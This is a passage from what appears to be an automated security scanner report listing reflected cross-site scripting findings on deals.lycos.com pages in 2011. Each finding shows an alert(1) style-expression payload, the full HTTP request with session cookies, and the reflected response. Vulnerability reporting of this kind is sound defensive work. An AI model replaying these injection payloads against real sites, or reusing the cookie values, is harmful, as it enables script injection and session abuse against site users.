<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?e577e"><script>alert(1)</script>5bdc50df2f3=1&mobile=1" rel="nofollow">
...[SNIP]...

1.247. http://deals.lycos.com/coupons [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de73e"style%3d"x%3aexpression(alert(1))"be0d61fbb03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de73e"style="x:expression(alert(1))"be0d61fbb03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coupons?de73e"style%3d"x%3aexpression(alert(1))"be0d61fbb03=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:56:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:56:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43186

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Online Coupons, Shopping D
...[SNIP]...
<a href="?pn=2&amp;de73e"style="x:expression(alert(1))"be0d61fbb03=1">
...[SNIP]...

1.248. http://deals.lycos.com/deals [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 917e1"style%3d"x%3aexpression(alert(1))"f0d4418b1b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 917e1"style="x:expression(alert(1))"f0d4418b1b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals?917e1"style%3d"x%3aexpression(alert(1))"f0d4418b1b4=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:56:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:56:38 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76685

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Shopping Deals, Online Cou
...[SNIP]...
<a href="/deals?pn=2&amp;917e1"style="x:expression(alert(1))"f0d4418b1b4=1">
...[SNIP]...

1.249. http://deals.lycos.com/deals/category/cameras-167 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/cameras-167

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91252"style%3d"x%3aexpression(alert(1))"512a2f2bd53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91252"style="x:expression(alert(1))"512a2f2bd53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/cameras-167?91252"style%3d"x%3aexpression(alert(1))"512a2f2bd53=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:33 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 77036

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Cameras Deals, Cameras Sal
...[SNIP]...
<a href="?pn=2&amp;91252"style="x:expression(alert(1))"512a2f2bd53=1">
...[SNIP]...

1.250. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/clothing-and-accessories-202

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22927"style%3d"x%3aexpression(alert(1))"123f49753eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 22927"style="x:expression(alert(1))"123f49753eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/clothing-and-accessories-202?22927"style%3d"x%3aexpression(alert(1))"123f49753eb=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:54:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:54:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76670

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<a href="?pn=2&amp;22927"style="x:expression(alert(1))"123f49753eb=1">
...[SNIP]...

1.251. http://deals.lycos.com/deals/category/computer-39 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/computer-39

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27454"style%3d"x%3aexpression(alert(1))"160b3153f7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 27454"style="x:expression(alert(1))"160b3153f7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/computer-39?27454"style%3d"x%3aexpression(alert(1))"160b3153f7b=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78985

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<a href="?pn=2&amp;27454"style="x:expression(alert(1))"160b3153f7b=1">
...[SNIP]...

1.252. http://deals.lycos.com/deals/category/digital-cameras-168 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/digital-cameras-168

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f182"style%3d"x%3aexpression(alert(1))"c14e1873a38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f182"style="x:expression(alert(1))"c14e1873a38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/digital-cameras-168?9f182"style%3d"x%3aexpression(alert(1))"c14e1873a38=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:21:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:21:33 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 77375

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Digital Cameras Deals, Dig
...[SNIP]...
<a href="?pn=2&amp;9f182"style="x:expression(alert(1))"c14e1873a38=1">
...[SNIP]...

1.253. http://deals.lycos.com/deals/category/electronics-142 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/electronics-142

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25015"style%3d"x%3aexpression(alert(1))"9a38289e23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25015"style="x:expression(alert(1))"9a38289e23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/electronics-142?25015"style%3d"x%3aexpression(alert(1))"9a38289e23=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 81210

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<a href="?pn=2&amp;25015"style="x:expression(alert(1))"9a38289e23=1">
...[SNIP]...

1.254. http://deals.lycos.com/deals/category/gaming-and-toys-186 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/gaming-and-toys-186

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9863"style%3d"x%3aexpression(alert(1))"1f2d8a9950d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9863"style="x:expression(alert(1))"1f2d8a9950d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/gaming-and-toys-186?c9863"style%3d"x%3aexpression(alert(1))"1f2d8a9950d=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:54:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:00 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78449

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<a href="?pn=2&amp;c9863"style="x:expression(alert(1))"1f2d8a9950d=1">
...[SNIP]...

1.255. http://deals.lycos.com/deals/category/home-and-garden-196 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/home-and-garden-196

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43779"style%3d"x%3aexpression(alert(1))"b2b3b9b99d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43779"style="x:expression(alert(1))"b2b3b9b99d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/home-and-garden-196?43779"style%3d"x%3aexpression(alert(1))"b2b3b9b99d2=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:54:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:54:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76744

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<a href="?pn=2&amp;43779"style="x:expression(alert(1))"b2b3b9b99d2=1">
...[SNIP]...

1.256. http://deals.lycos.com/deals/category/lcd-tvs-424 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/lcd-tvs-424

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d43f9"style%3d"x%3aexpression(alert(1))"f93cc994d8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d43f9"style="x:expression(alert(1))"f93cc994d8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/lcd-tvs-424?d43f9"style%3d"x%3aexpression(alert(1))"f93cc994d8f=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:21:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:21:33 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 77805

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>LCD TVs Deals, LCD TVs Sal
...[SNIP]...
<a href="?pn=2&amp;d43f9"style="x:expression(alert(1))"f93cc994d8f=1">
...[SNIP]...

1.257. http://deals.lycos.com/deals/category/movies-music-books-178 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/movies-music-books-178

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc26"style%3d"x%3aexpression(alert(1))"3a91edf5df2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dfc26"style="x:expression(alert(1))"3a91edf5df2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/movies-music-books-178?dfc26"style%3d"x%3aexpression(alert(1))"3a91edf5df2=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76739

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<a href="?pn=2&amp;dfc26"style="x:expression(alert(1))"3a91edf5df2=1">
...[SNIP]...

1.258. http://deals.lycos.com/deals/category/mp3-players-144 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/mp3-players-144

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53ad7"style%3d"x%3aexpression(alert(1))"1e24dff5a28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 53ad7"style="x:expression(alert(1))"1e24dff5a28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/mp3-players-144?53ad7"style%3d"x%3aexpression(alert(1))"1e24dff5a28=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:21:31 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76316

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>MP3 Players Deals, MP3 Pla
...[SNIP]...
<a href="?pn=2&amp;53ad7"style="x:expression(alert(1))"1e24dff5a28=1">
...[SNIP]...

1.259. http://deals.lycos.com/deals/category/office-and-supplies-182 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/office-and-supplies-182

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efe58"style%3d"x%3aexpression(alert(1))"08254d1432 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as efe58"style="x:expression(alert(1))"08254d1432 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/office-and-supplies-182?efe58"style%3d"x%3aexpression(alert(1))"08254d1432=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:22 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 77239

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
